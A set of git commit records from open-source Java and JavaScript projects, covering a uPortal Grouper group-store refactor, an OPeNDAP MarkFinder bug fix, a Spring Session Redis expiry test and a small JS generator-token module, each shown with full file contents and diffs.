"Group updates are not supported by the Grouper groups service"); } /* * (non-Javadoc) * @see org.jasig.portal.groups.IEntityStore#newInstance(java.lang.String) */ public IEntity newInstance(String key) throws GroupsException { throw new UnsupportedOperationException( "Group updates are not supported by the Grouper groups service"); } /* * (non-Javadoc) * @see org.jasig.portal.groups.IEntityStore#newInstance(java.lang.String, java.lang.Class) */ @SuppressWarnings("unchecked") public IEntity newInstance(String key, Class type) throws GroupsException { throw new UnsupportedOperationException( "Group updates are not supported by the Grouper groups service"); } /* * (non-Javadoc) * @see org.jasig.portal.groups.IEntitySearcher#searchForEntities(java.lang.String, int, java.lang.Class) */ @SuppressWarnings("unchecked") public EntityIdentifier[] searchForEntities(String query, int method, Class type) throws GroupsException { throw new UnsupportedOperationException( "Entity search is not supported by the Grouper groups service"); } }
UP-2670 Updating the Grouper group store to collect display names and descriptions from Grouper web services. git-svn-id: 477788cc2a8229a747c5b8073e47c1d0f6ec0604@21571 f5dbab47-78f9-eb45-b975-e544023573eb
uportal-war/src/main/java/org/jasig/portal/groups/grouper/GrouperEntityGroupStore.java
UP-2670 Updating the Grouper group store to collect display names and descriptions from Grouper web services.
<ide><path>portal-war/src/main/java/org/jasig/portal/groups/grouper/GrouperEntityGroupStore.java <ide> // Search the Grouper server for groups with the specified local <ide> // key <ide> LOGGER.debug("Searching Grouper for a direct match for key: " + key); <del> GcGetGroups getGroups = new GcGetGroups(); <del> getGroups.addSubjectIdentifier(key); <del> WsGetGroupsResults results = getGroups.execute(); <del> <del> // if no results were returned, return null <del> if (results == null || results.getResults() == null <del> || results.getResults().length == 0) { <del> LOGGER.debug("Grouper service returned no matches for key " + key); <del> return null; <del> } <del> <del> // construct a uPortal group representation of the first returned <del> // result <del> WsSubject subject = results.getResults()[0].getWsSubject(); <del> IEntityGroup group = new EntityGroupImpl(subject.getName(), IPerson.class); <del> <del> // TODO: need to set the group name and description to the actual <del> // display name and description <del> group.setName(subject.getName()); <del> <add> WsGroup wsGroup = findGroupFromKey(key); <add> if (wsGroup == null) { <add> return null; <add> } <add> IEntityGroup group = createUportalGroupFromGrouperGroup(wsGroup); <add> <ide> if (LOGGER.isDebugEnabled()) { <ide> LOGGER.debug("Retrieved group from the Grouper server matching key " <ide> + key + ": " + group.toString()); <ide> if (LOGGER.isDebugEnabled()) { <ide> LOGGER.trace("Retrieved group: " + g.getName()); <ide> } <del> IEntityGroup parent = new EntityGroupImpl(g.getName(), IPerson.class); <del> // TODO: set display name and description <del> parent.setName(g.getName()); <add> IEntityGroup parent = createUportalGroupFromGrouperGroup(g); <ide> } <ide> } <ide> } <ide> // if the member is a person group <ide> if (gInfo.getName() != null && gInfo.getName().contains(":")) { <ide> LOGGER.trace("creating group member: " + gInfo.getName()); <del> IEntityGroup member = new EntityGroupImpl(gInfo.getAttributeValue(4), IPerson.class); <del> // TODO: set display name and description <del> member.setName(gInfo.getAttributeValue(4)); <del> members.add(member); <add> <add> WsGroup wsGroup = findGroupFromKey(gInfo.getAttributeValue(4)); <add> if (wsGroup != null) { <add> IEntityGroup member = createUportalGroupFromGrouperGroup(wsGroup); <add> members.add(member); <add> } <ide> } <ide> <ide> // otherwise assume the member is an individual person <ide> for (WsGetGroupsResult wsg : results.getResults()) { <ide> if (wsg.getWsGroups() != null) { <ide> for (WsGroup g : wsg.getWsGroups()) { <del> IEntityGroup member = new EntityGroupImpl(g.getName(), IPerson.class); <del> // TODO: set display name and description <del> member.setName(g.getName()); <add> IEntityGroup member = createUportalGroupFromGrouperGroup(g); <ide> members.add(member); <ide> if (LOGGER.isTraceEnabled()) { <ide> LOGGER.trace("found IEntityGroup member: " + member); <ide> } <ide> } <ide> <del> <add> /** <add> * Construct an IEntityGroup from a Grouper WsGroup. 
<add> * <add> * @param wsGroup <add> * @return the group <add> */ <add> protected IEntityGroup createUportalGroupFromGrouperGroup(WsGroup wsGroup) { <add> IEntityGroup iEntityGroup = new EntityGroupImpl(wsGroup.getName(), <add> IPerson.class); <add> <add> // need to set the group name and description to the actual <add> // display name and description <add> iEntityGroup.setName(wsGroup.getDisplayName()); <add> iEntityGroup.setDescription(wsGroup.getDescription()); <add> return iEntityGroup; <add> } <add> <add> /** <add> * Find the Grouper group matching the specified key. <add> * <add> * @param key <add> * @return the group or null <add> */ <add> protected WsGroup findGroupFromKey(String key) { <add> GcFindGroups gcFindGroups = new GcFindGroups(); <add> gcFindGroups.addGroupName(key); <add> WsFindGroupsResults results = gcFindGroups.execute(); <add> <add> // if no results were returned, return null <add> if (results == null || results.getGroupResults() == null <add> || results.getGroupResults().length == 0) { <add> LOGGER.debug("Grouper service returned no matches for key " + key); <add> return null; <add> } <add> <add> // construct a uPortal group representation of the first returned <add> // result <add> WsGroup wsGroup = results.getGroupResults()[0]; <add> return wsGroup; <add> } <add> <ide> /* <ide> * UNSUPPORTED WRITE OPERATIONS <ide> *
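The refactor above centralizes the WsGroup-to-IEntityGroup conversion in createUportalGroupFromGrouperGroup(...), so the Grouper system name stays the uPortal key while the user-visible name and description now come from the Grouper display fields instead of the key. A rough usage sketch follows; it is illustrative only, the group values are invented, the example class is hypothetical, and the WsGroup setters are assumed to mirror the getters the store already calls.

package org.jasig.portal.groups.grouper;

import edu.internet2.middleware.grouperClient.ws.beans.WsGroup;
import org.jasig.portal.groups.IEntityGroup;

// Hypothetical example, placed in the same package so it can reach the store's
// package-private constructor and protected helper method.
public class GrouperGroupMappingExample {

    public static void main(String[] args) {
        WsGroup ws = new WsGroup();                        // stub bean, no web-service call
        ws.setName("etc:sandbox:portal:staff");            // invented Grouper system name (the local key)
        ws.setDisplayName("Portal Staff");                 // becomes the group's name
        ws.setDescription("Staff members of the portal");  // becomes the group's description

        GrouperEntityGroupStore store = new GrouperEntityGroupStore();
        IEntityGroup group = store.createUportalGroupFromGrouperGroup(ws);

        System.out.println(group.getName());        // Portal Staff
        System.out.println(group.getDescription()); // Staff members of the portal
    }
}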
Java
lgpl-2.1
e672a0c1db6b7cf6a6f776bb92306b482a8d77ad
0
OPENDAP/olfs,OPENDAP/olfs,OPENDAP/olfs,OPENDAP/olfs,OPENDAP/olfs,OPENDAP/olfs
///////////////////////////////////////////////////////////////////////////// // This file is part of the "OPeNDAP 4 Data Server (aka Hyrex)" project. // // // Copyright (c) 2006 OPeNDAP, Inc. // Author: Nathan David Potter <[email protected]> // // This library is free software; you can redistribute it and/or // modify it under the terms of the GNU Lesser General Public // License as published by the Free Software Foundation; either // version 2.1 of the License, or (at your option) any later version. // // This library is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU // Lesser General Public License for more details. // // You should have received a copy of the GNU Lesser General Public // License along with this library; if not, write to the Free Software // Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA // // You can contact OPeNDAP, Inc. at PO Box 112, Saunderstown, RI. 02874-0112. ///////////////////////////////////////////////////////////////////////////// package opendap.ppt; import org.slf4j.Logger; /** * Created by IntelliJ IDEA. * User: ndp * Date: Feb 9, 2006 * Time: 1:23:14 PM * To change this template use File | Settings | File Templates. */ public class MarkFinder { private int _markIndex; private byte[] _mark; Logger log; public MarkFinder(byte[] mark){ _mark = mark.clone(); _markIndex = 0; log = org.slf4j.LoggerFactory.getLogger(getClass()); log.debug("New MarkFinder. _mark="+new String(_mark)); } public byte[] getMark(){ return _mark.clone(); } public int getMarkIndex(){ return _markIndex; } public boolean markCheck(byte b) { if (_mark[_markIndex] == b) { log.debug("Found mark byte: "+b+" at index: "+_markIndex); _markIndex++; if (_markIndex == _mark.length) { _markIndex = 0; return (true); } } else if (_mark[0] == b) { log.debug("."); _markIndex = 1; } else { log.debug("*"); _markIndex = 0; } return false; } }
src/opendap/ppt/MarkFinder.java
///////////////////////////////////////////////////////////////////////////// // This file is part of the "OPeNDAP 4 Data Server (aka Hyrex)" project. // // // Copyright (c) 2006 OPeNDAP, Inc. // Author: Nathan David Potter <[email protected]> // // This library is free software; you can redistribute it and/or // modify it under the terms of the GNU Lesser General Public // License as published by the Free Software Foundation; either // version 2.1 of the License, or (at your option) any later version. // // This library is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU // Lesser General Public License for more details. // // You should have received a copy of the GNU Lesser General Public // License along with this library; if not, write to the Free Software // Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA // // You can contact OPeNDAP, Inc. at PO Box 112, Saunderstown, RI. 02874-0112. ///////////////////////////////////////////////////////////////////////////// package opendap.ppt; import org.slf4j.Logger; /** * Created by IntelliJ IDEA. * User: ndp * Date: Feb 9, 2006 * Time: 1:23:14 PM * To change this template use File | Settings | File Templates. */ public class MarkFinder { private int _markIndex; private byte[] _mark; Logger log; public MarkFinder(byte[] mark){ _mark = mark.clone(); _markIndex = 0; log = org.slf4j.LoggerFactory.getLogger(getClass()); log.debug("New MarkFinder. _mark="+new String(_mark)); } public byte[] getMark(){ return _mark.clone(); } public int getMarkIndex(){ return _markIndex; } public boolean markCheck(byte b) { if (_mark[_markIndex] == b) { log.debug("Found mark byte: "+b+" at index: "+_markIndex); _markIndex++; if (_markIndex == _mark.length) { _markIndex = 0; return (true); } } else { log.debug("*"); _markIndex = 0; } return false; } }
olfs: Fixed bug in PPT MarkFinder
src/opendap/ppt/MarkFinder.java
olfs: Fixed bug in PPT MarkFinder
<ide><path>rc/opendap/ppt/MarkFinder.java <ide> _markIndex = 0; <ide> log = org.slf4j.LoggerFactory.getLogger(getClass()); <ide> <del> log.debug("New MarkFinder. _mark="+new String(_mark)); <add> log.debug("New MarkFinder. _mark="+new String(_mark)); <ide> } <ide> <ide> public byte[] getMark(){ <ide> _markIndex = 0; <ide> return (true); <ide> } <add> } else if (_mark[0] == b) { <add> log.debug("."); <add> _markIndex = 1; <ide> } else { <del> log.debug("*"); <del> _markIndex = 0; <add> log.debug("*"); <add> _markIndex = 0; <ide> } <ide> <ide> return false;
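The fix above changes markCheck(...) so that, when a byte breaks the current partial match but happens to equal the first mark byte, matching restarts at index 1 instead of being thrown away. With mark "AB" and the byte stream "AAB", the old code reset to index 0 after the second 'A' and never reported the mark; the fixed version keeps that 'A' as the start of a new partial match and reports the mark when 'B' arrives. (The restart still only considers the first mark byte, so a mark with a longer repeated prefix, such as "AAB" inside "AAAB", can still be missed.) A small driver sketch, with made-up mark and input bytes and a hypothetical class name:

import opendap.ppt.MarkFinder;

// Hypothetical driver, for illustration only.
public class MarkFinderExample {

    public static void main(String[] args) {
        MarkFinder finder = new MarkFinder("AB".getBytes());
        boolean found = false;
        for (byte b : "AAB".getBytes()) {
            found = finder.markCheck(b) || found;
        }
        // Prints true with the fixed class; the pre-fix version printed false here.
        System.out.println(found);
    }
}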
Java
apache-2.0
0f09d5e0009a4be6483b4567826cf83010c48dba
0
vpavic/spring-session,vpavic/spring-session,vpavic/spring-session
/* * Copyright 2002-2014 the original author or authors. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ package org.springframework.session.data.redis.config.annotation.web.http; import static org.fest.assertions.Assertions.assertThat; import java.io.IOException; import java.net.ServerSocket; import org.junit.Before; import org.junit.Test; import org.junit.runner.RunWith; import org.springframework.beans.BeansException; import org.springframework.beans.factory.DisposableBean; import org.springframework.beans.factory.InitializingBean; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.beans.factory.config.ConfigurableListableBeanFactory; import org.springframework.beans.factory.support.BeanDefinitionRegistry; import org.springframework.beans.factory.support.BeanDefinitionRegistryPostProcessor; import org.springframework.context.ApplicationListener; import org.springframework.context.annotation.Bean; import org.springframework.context.annotation.Configuration; import org.springframework.data.redis.connection.jedis.JedisConnectionFactory; import org.springframework.scheduling.annotation.EnableScheduling; import org.springframework.security.authentication.UsernamePasswordAuthenticationToken; import org.springframework.security.core.Authentication; import org.springframework.security.core.authority.AuthorityUtils; import org.springframework.security.core.context.SecurityContext; import org.springframework.security.core.context.SecurityContextHolder; import org.springframework.session.ExpiringSession; import org.springframework.session.Session; import org.springframework.session.SessionRepository; import org.springframework.session.data.redis.config.annotation.web.http.EnableRedisHttpSession; import org.springframework.session.events.SessionDestroyedEvent; import org.springframework.test.context.ContextConfiguration; import org.springframework.test.context.junit4.SpringJUnit4ClassRunner; import redis.clients.jedis.Protocol; import redis.embedded.RedisServer; @RunWith(SpringJUnit4ClassRunner.class) @ContextConfiguration public class EnableRedisHttpSessionExpireSessionDestroyedTests<S extends ExpiringSession> { private RedisServer redisServer; @Autowired private SessionRepository<S> repository; @Autowired private SessionDestroyedEventRegistry registry; private final Object lock = new Object(); @Before public void setup() { registry.setLock(lock); } @Test public void expireFiresSessionDestroyedEvent() throws InterruptedException { S toSave = repository.createSession(); toSave.setAttribute("a", "b"); Authentication toSaveToken = new UsernamePasswordAuthenticationToken("user","password", AuthorityUtils.createAuthorityList("ROLE_USER")); SecurityContext toSaveContext = SecurityContextHolder.createEmptyContext(); toSaveContext.setAuthentication(toSaveToken); toSave.setAttribute("SPRING_SECURITY_CONTEXT", toSaveContext); repository.save(toSave); synchronized (lock) { lock.wait((toSave.getMaxInactiveIntervalInSeconds() * 1000) + 1); } if(!registry.receivedEvent()) { // Redis 
makes no guarantees on when an expired event will be fired // we can ensure it gets fired by trying to get the session repository.getSession(toSave.getId()); synchronized (lock) { if(!registry.receivedEvent()) { // wait at most second to process the event lock.wait(1000); } } } assertThat(registry.receivedEvent()).isTrue(); } static class SessionDestroyedEventRegistry implements ApplicationListener<SessionDestroyedEvent> { private boolean receivedEvent; private Object lock; @Override public void onApplicationEvent(SessionDestroyedEvent event) { synchronized (lock) { receivedEvent = true; lock.notifyAll(); } } public boolean receivedEvent() { return receivedEvent; } public void setLock(Object lock) { this.lock = lock; } } @Configuration @EnableRedisHttpSession(maxInactiveIntervalInSeconds = 1) static class Config { @Bean public JedisConnectionFactory connectionFactory() throws Exception { JedisConnectionFactory factory = new JedisConnectionFactory(); factory.setPort(getPort()); factory.setUsePool(false); return factory; } @Bean public static RedisServerBean redisServer() { return new RedisServerBean(); } @Bean public SessionDestroyedEventRegistry sessionDestroyedEventRegistry() { return new SessionDestroyedEventRegistry(); } /** * Implements BeanDefinitionRegistryPostProcessor to ensure this Bean * is initialized before any other Beans. Specifically, we want to ensure * that the Redis Server is started before RedisHttpSessionConfiguration * attempts to enable Keyspace notifications. */ static class RedisServerBean implements InitializingBean, DisposableBean, BeanDefinitionRegistryPostProcessor { private RedisServer redisServer; @Override public void afterPropertiesSet() throws Exception { redisServer = new RedisServer(getPort()); redisServer.start(); } @Override public void destroy() throws Exception { if(redisServer != null) { redisServer.stop(); } } @Override public void postProcessBeanDefinitionRegistry(BeanDefinitionRegistry registry) throws BeansException {} @Override public void postProcessBeanFactory(ConfigurableListableBeanFactory beanFactory) throws BeansException {} } } private static Integer availablePort; private static int getPort() throws IOException { if(availablePort == null) { ServerSocket socket = new ServerSocket(0); availablePort = socket.getLocalPort(); socket.close(); } return Protocol.DEFAULT_PORT; } }
spring-session/src/integration-test/java/org/springframework/session/data/redis/config/annotation/web/http/EnableRedisHttpSessionExpireSessionDestroyedTests.java
/* * Copyright 2002-2014 the original author or authors. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ package org.springframework.session.data.redis.config.annotation.web.http; import static org.fest.assertions.Assertions.assertThat; import java.io.IOException; import java.net.ServerSocket; import org.junit.Before; import org.junit.Test; import org.junit.runner.RunWith; import org.springframework.beans.BeansException; import org.springframework.beans.factory.DisposableBean; import org.springframework.beans.factory.InitializingBean; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.beans.factory.config.ConfigurableListableBeanFactory; import org.springframework.beans.factory.support.BeanDefinitionRegistry; import org.springframework.beans.factory.support.BeanDefinitionRegistryPostProcessor; import org.springframework.context.ApplicationListener; import org.springframework.context.annotation.Bean; import org.springframework.context.annotation.Configuration; import org.springframework.data.redis.connection.jedis.JedisConnectionFactory; import org.springframework.scheduling.annotation.EnableScheduling; import org.springframework.security.authentication.UsernamePasswordAuthenticationToken; import org.springframework.security.core.Authentication; import org.springframework.security.core.authority.AuthorityUtils; import org.springframework.security.core.context.SecurityContext; import org.springframework.security.core.context.SecurityContextHolder; import org.springframework.session.Session; import org.springframework.session.SessionRepository; import org.springframework.session.data.redis.config.annotation.web.http.EnableRedisHttpSession; import org.springframework.session.events.SessionDestroyedEvent; import org.springframework.test.context.ContextConfiguration; import org.springframework.test.context.junit4.SpringJUnit4ClassRunner; import redis.clients.jedis.Protocol; import redis.embedded.RedisServer; @RunWith(SpringJUnit4ClassRunner.class) @ContextConfiguration public class EnableRedisHttpSessionExpireSessionDestroyedTests<S extends Session> { private RedisServer redisServer; @Autowired private SessionRepository<S> repository; @Autowired private SessionDestroyedEventRegistry registry; private final Object lock = new Object(); @Before public void setup() { registry.setLock(lock); } @Test public void expireFiresSessionDestroyedEvent() throws InterruptedException { S toSave = repository.createSession(); toSave.setAttribute("a", "b"); Authentication toSaveToken = new UsernamePasswordAuthenticationToken("user","password", AuthorityUtils.createAuthorityList("ROLE_USER")); SecurityContext toSaveContext = SecurityContextHolder.createEmptyContext(); toSaveContext.setAuthentication(toSaveToken); toSave.setAttribute("SPRING_SECURITY_CONTEXT", toSaveContext); repository.save(toSave); synchronized (lock) { lock.wait(1100); } if(!registry.receivedEvent()) { // Redis makes no guarantees on when an expired event will be fired // we can ensure it gets fired by trying to get the 
session repository.getSession(toSave.getId()); } assertThat(registry.receivedEvent()).isTrue(); } static class SessionDestroyedEventRegistry implements ApplicationListener<SessionDestroyedEvent> { private boolean receivedEvent; private Object lock; @Override public void onApplicationEvent(SessionDestroyedEvent event) { receivedEvent = true; synchronized (lock) { lock.notifyAll(); } } public boolean receivedEvent() { return receivedEvent; } public void setLock(Object lock) { this.lock = lock; } } @Configuration @EnableRedisHttpSession(maxInactiveIntervalInSeconds = 1) static class Config { @Bean public JedisConnectionFactory connectionFactory() throws Exception { JedisConnectionFactory factory = new JedisConnectionFactory(); factory.setPort(getPort()); factory.setUsePool(false); return factory; } @Bean public static RedisServerBean redisServer() { return new RedisServerBean(); } @Bean public SessionDestroyedEventRegistry sessionDestroyedEventRegistry() { return new SessionDestroyedEventRegistry(); } /** * Implements BeanDefinitionRegistryPostProcessor to ensure this Bean * is initialized before any other Beans. Specifically, we want to ensure * that the Redis Server is started before RedisHttpSessionConfiguration * attempts to enable Keyspace notifications. */ static class RedisServerBean implements InitializingBean, DisposableBean, BeanDefinitionRegistryPostProcessor { private RedisServer redisServer; @Override public void afterPropertiesSet() throws Exception { redisServer = new RedisServer(getPort()); redisServer.start(); } @Override public void destroy() throws Exception { if(redisServer != null) { redisServer.stop(); } } @Override public void postProcessBeanDefinitionRegistry(BeanDefinitionRegistry registry) throws BeansException {} @Override public void postProcessBeanFactory(ConfigurableListableBeanFactory beanFactory) throws BeansException {} } } private static Integer availablePort; private static int getPort() throws IOException { if(availablePort == null) { ServerSocket socket = new ServerSocket(0); availablePort = socket.getLocalPort(); socket.close(); } return Protocol.DEFAULT_PORT; } }
Polish EnableRedisHttpSessionExpireSessionDestroyedTests
spring-session/src/integration-test/java/org/springframework/session/data/redis/config/annotation/web/http/EnableRedisHttpSessionExpireSessionDestroyedTests.java
Polish EnableRedisHttpSessionExpireSessionDestroyedTests
<ide><path>pring-session/src/integration-test/java/org/springframework/session/data/redis/config/annotation/web/http/EnableRedisHttpSessionExpireSessionDestroyedTests.java
<ide> import org.springframework.security.core.authority.AuthorityUtils;
<ide> import org.springframework.security.core.context.SecurityContext;
<ide> import org.springframework.security.core.context.SecurityContextHolder;
<add>import org.springframework.session.ExpiringSession;
<ide> import org.springframework.session.Session;
<ide> import org.springframework.session.SessionRepository;
<ide> import org.springframework.session.data.redis.config.annotation.web.http.EnableRedisHttpSession;
<ide>
<ide> @RunWith(SpringJUnit4ClassRunner.class)
<ide> @ContextConfiguration
<del>public class EnableRedisHttpSessionExpireSessionDestroyedTests<S extends Session> {
<add>public class EnableRedisHttpSessionExpireSessionDestroyedTests<S extends ExpiringSession> {
<ide> private RedisServer redisServer;
<ide>
<ide> @Autowired
<ide> repository.save(toSave);
<ide>
<ide> synchronized (lock) {
<del> lock.wait(1100);
<add> lock.wait((toSave.getMaxInactiveIntervalInSeconds() * 1000) + 1);
<ide> }
<ide> if(!registry.receivedEvent()) {
<ide> // Redis makes no guarantees on when an expired event will be fired
<ide> // we can ensure it gets fired by trying to get the session
<ide> repository.getSession(toSave.getId());
<add> synchronized (lock) {
<add> if(!registry.receivedEvent()) {
<add> // wait at most second to process the event
<add> lock.wait(1000);
<add> }
<add> }
<ide> }
<ide> assertThat(registry.receivedEvent()).isTrue();
<ide> }
<ide>
<ide> @Override
<ide> public void onApplicationEvent(SessionDestroyedEvent event) {
<del> receivedEvent = true;
<ide> synchronized (lock) {
<add> receivedEvent = true;
<ide> lock.notifyAll();
<ide> }
<ide> }
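The record above is a Spring Session integration test that coordinates two threads through a shared lock object: the SessionDestroyedEvent listener sets a flag and calls notifyAll(), while the test thread waits with a timeout and then re-checks the flag. Below is a minimal, self-contained sketch of that wait/notify handshake, assuming nothing from spring-session; the class and method names (EventFlagDemo, onEvent, awaitEvent) are invented for illustration.

// Illustrative sketch of the wait/notify handshake used by the test above.
// Names are hypothetical; this is not code from the spring-session repository.
public class EventFlagDemo {
    private final Object lock = new Object();
    private boolean receivedEvent;

    // Listener side: set the flag and notify while holding the lock.
    public void onEvent() {
        synchronized (lock) {
            receivedEvent = true;
            lock.notifyAll();
        }
    }

    // Waiting side: wait up to timeoutMillis for the flag, looping to tolerate spurious wakeups.
    public boolean awaitEvent(long timeoutMillis) throws InterruptedException {
        long deadline = System.currentTimeMillis() + timeoutMillis;
        synchronized (lock) {
            while (!receivedEvent) {
                long remaining = deadline - System.currentTimeMillis();
                if (remaining <= 0) {
                    break; // timed out; the caller may poke the resource and retry
                }
                lock.wait(remaining);
            }
            return receivedEvent;
        }
    }

    public static void main(String[] args) throws InterruptedException {
        EventFlagDemo demo = new EventFlagDemo();
        new Thread(() -> {
            try {
                Thread.sleep(200);
            } catch (InterruptedException ignored) {
            }
            demo.onEvent();
        }).start();
        System.out.println("event received: " + demo.awaitEvent(1000));
    }
}

The diff in this record follows the same discipline: the flag assignment moves inside the synchronized block, the first wait is derived from the session's maximum inactive interval instead of a hard-coded 1100 ms, and a bounded second wait is added after touching the session so the event has time to be processed.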
JavaScript
bsd-3-clause
c14b3dfc2d3a93377ba0f3ab15a2f2c3296e6693
0
dmitriiabramov/sharkhorse
/*
 * Copyright 2015, Yahoo Inc.
 * Copyrights licensed under the New BSD License.
 * See the accompanying LICENSE file for terms.
 */

/**
 * That module marks generator functions as generators by assigning a specific uuid value to a specific property name.
 * Later, when evaluating the factory, we can identify a generator function by its token.
 * similar to `instanceof` but for functions
 */

const IDENTIFIER = '8A12ABDF-FF00-4FDD-B8BD-EEC6B8D558F7'
const TOKEN_PROP_NAME = 'sharkhorseGeneratorToken';
import invariant from './invariant';

export function markAsGenerator(fn) {
    invariant(fn, 'fn argument is required');
    fn[TOKEN_PROP_NAME] = IDENTIFIER;
}

export function isGenerator(obj) {
    if (!obj) {
        return false;
    }

    return obj[TOKEN_PROP_NAME] === IDENTIFIER;
}
src/generator_token.js
/*
 * Copyright 2015, Yahoo Inc.
 * Copyrights licensed under the New BSD License.
 * See the accompanying LICENSE file for terms.
 */

/**
 * That module marks generator functions as generators by assigning a specific uuid value to a specific property name.
 * Later, when evaluating the factory, we can identify a generator function by its token.
 * similar to `instanceof` but for functions
 */

const IDENTIFIER = '8A12ABDF-FF00-4FDD-B8BD-EEC6B8D558F7'
const TOKEN_PROP_NAME = 'sharkhorseGeneratorToken';

export function markAsGenerator(fn) {
    fn[TOKEN_PROP_NAME] = IDENTIFIER;
}

export function isGenerator(obj) {
    return obj[TOKEN_PROP_NAME] === IDENTIFIER;
}
not generator for falsy values
src/generator_token.js
not generator for falsy values
<ide><path>rc/generator_token.js
<ide>
<ide> const IDENTIFIER = '8A12ABDF-FF00-4FDD-B8BD-EEC6B8D558F7'
<ide> const TOKEN_PROP_NAME = 'sharkhorseGeneratorToken';
<add>import invariant from './invariant';
<ide>
<ide> export function markAsGenerator(fn) {
<add> invariant(fn, 'fn argument is required');
<ide> fn[TOKEN_PROP_NAME] = IDENTIFIER;
<ide> }
<ide>
<ide> export function isGenerator(obj) {
<add> if (!obj) {
<add> return false;
<add> }
<add>
<ide> return obj[TOKEN_PROP_NAME] === IDENTIFIER;
<ide> }
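The module in the record above brands a function by writing a UUID under a known property name so it can later be recognized, described in its own comment as similar to instanceof but for functions; the commit adds an invariant on the argument and a guard for falsy inputs. For comparison, here is a rough Java analogue of the same idea; it is only an illustration with invented names, and because Java lambdas cannot carry ad-hoc properties it tracks marked instances by identity instead of by a property.

import java.util.Collections;
import java.util.IdentityHashMap;
import java.util.Set;
import java.util.function.Supplier;

// Illustrative Java analogue of the token-marking scheme above (names are hypothetical).
public final class GeneratorToken {
    // Identity-based registry standing in for the UUID property used in the JavaScript module.
    private static final Set<Object> MARKED =
            Collections.newSetFromMap(new IdentityHashMap<>());

    private GeneratorToken() {
    }

    public static void markAsGenerator(Supplier<?> fn) {
        if (fn == null) {
            // mirrors invariant(fn, 'fn argument is required') from the commit
            throw new IllegalArgumentException("fn argument is required");
        }
        MARKED.add(fn);
    }

    public static boolean isGenerator(Object obj) {
        if (obj == null) {
            // mirrors the added guard for falsy values
            return false;
        }
        return MARKED.contains(obj);
    }

    public static void main(String[] args) {
        Supplier<String> gen = () -> "value";
        markAsGenerator(gen);
        System.out.println(isGenerator(gen));  // true
        System.out.println(isGenerator(null)); // false
    }
}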
Java
apache-2.0
be546b629944ff9ecd5582494cefa84027f3af64
0
TangHao1987/intellij-community,michaelgallacher/intellij-community,tmpgit/intellij-community,fengbaicanhe/intellij-community,pwoodworth/intellij-community,petteyg/intellij-community,da1z/intellij-community,supersven/intellij-community,vvv1559/intellij-community,kdwink/intellij-community,slisson/intellij-community,kdwink/intellij-community,supersven/intellij-community,orekyuu/intellij-community,ol-loginov/intellij-community,alphafoobar/intellij-community,allotria/intellij-community,ThiagoGarciaAlves/intellij-community,holmes/intellij-community,apixandru/intellij-community,gnuhub/intellij-community,vladmm/intellij-community,jagguli/intellij-community,fengbaicanhe/intellij-community,da1z/intellij-community,gnuhub/intellij-community,salguarnieri/intellij-community,adedayo/intellij-community,petteyg/intellij-community,slisson/intellij-community,MichaelNedzelsky/intellij-community,gnuhub/intellij-community,muntasirsyed/intellij-community,samthor/intellij-community,kool79/intellij-community,Distrotech/intellij-community,vladmm/intellij-community,nicolargo/intellij-community,clumsy/intellij-community,asedunov/intellij-community,MichaelNedzelsky/intellij-community,kdwink/intellij-community,MER-GROUP/intellij-community,SerCeMan/intellij-community,hurricup/intellij-community,salguarnieri/intellij-community,clumsy/intellij-community,holmes/intellij-community,blademainer/intellij-community,robovm/robovm-studio,fnouama/intellij-community,orekyuu/intellij-community,xfournet/intellij-community,gnuhub/intellij-community,blademainer/intellij-community,da1z/intellij-community,caot/intellij-community,ivan-fedorov/intellij-community,ThiagoGarciaAlves/intellij-community,MER-GROUP/intellij-community,pwoodworth/intellij-community,ibinti/intellij-community,clumsy/intellij-community,signed/intellij-community,ibinti/intellij-community,ol-loginov/intellij-community,nicolargo/intellij-community,TangHao1987/intellij-community,ahb0327/intellij-community,nicolargo/intellij-community,gnuhub/intellij-community,ahb0327/intellij-community,suncycheng/intellij-community,ahb0327/intellij-community,gnuhub/intellij-community,caot/intellij-community,kdwink/intellij-community,MER-GROUP/intellij-community,ftomassetti/intellij-community,idea4bsd/idea4bsd,wreckJ/intellij-community,diorcety/intellij-community,retomerz/intellij-community,ftomassetti/intellij-community,suncycheng/intellij-community,mglukhikh/intellij-community,ftomassetti/intellij-community,FHannes/intellij-community,vladmm/intellij-community,muntasirsyed/intellij-community,MER-GROUP/intellij-community,izonder/intellij-community,semonte/intellij-community,clumsy/intellij-community,muntasirsyed/intellij-community,ThiagoGarciaAlves/intellij-community,blademainer/intellij-community,MichaelNedzelsky/intellij-community,kdwink/intellij-community,fitermay/intellij-community,ryano144/intellij-community,SerCeMan/intellij-community,clumsy/intellij-community,holmes/intellij-community,slisson/intellij-community,retomerz/intellij-community,alphafoobar/intellij-community,retomerz/intellij-community,samthor/intellij-community,fengbaicanhe/intellij-community,FHannes/intellij-community,SerCeMan/intellij-community,Distrotech/intellij-community,clumsy/intellij-community,FHannes/intellij-community,diorcety/intellij-community,vladmm/intellij-community,tmpgit/intellij-community,akosyakov/intellij-community,apixandru/intellij-community,idea4bsd/idea4bsd,youdonghai/intellij-community,salguarnieri/intellij-community,muntasirsyed/intellij-community,dslomov/intellij-community,ThiagoGarciaAlves/inte
